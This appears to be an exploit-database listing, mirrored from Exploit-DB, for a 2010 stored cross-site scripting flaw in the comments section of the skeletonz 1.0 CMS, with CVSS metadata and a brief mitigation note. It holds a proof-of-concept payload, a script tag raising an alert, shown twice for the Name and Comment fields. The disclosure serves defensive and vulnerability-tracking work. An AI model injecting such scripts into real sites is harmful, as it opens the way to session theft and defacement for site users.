header-logo
Suggest Exploit
vendor:
skeletonz
by:
Jordan Diaz aka Jbyte
3,3
CVSS
MEDIUM
Cross-site Scripting (XSS)
79
CWE
Product Name: skeletonz
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: N/A
Related CWE: N/A
CPE: orangoo.com/skeletonz/
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP
2010

Xss on skeletonz-simple dynamic cms in the section comments

The follow xss is located in the section of comments of the CMS skeletonz. Xss Exploit field Name: <script>alert('xss');</script>field Comment: <script>alert('xss');</script>

Mitigation:

Input validation, output encoding, and context-sensitive output encoding can be used to mitigate XSS attacks.
Source

Exploit-DB raw data:

# Exploit Title: Xss on skeletonz-simple dynamic cms in the section comments
# Google Dork: 
# Date: 27/11/10
# Author: Jordan Diaz aka Jbyte
# Software Link: http://orangoo.com/skeletonz/
# Version: 1.0
# Tested on: Windows xp
# CVE : 
The follow xss is located in the section of comments of the CMS skeletonz
Xss Exploit
field Name: <script>alert('xss');</script>field Comment: <script>alert('xss');</script>

Navigation

Suggest Exploit

Services By CQR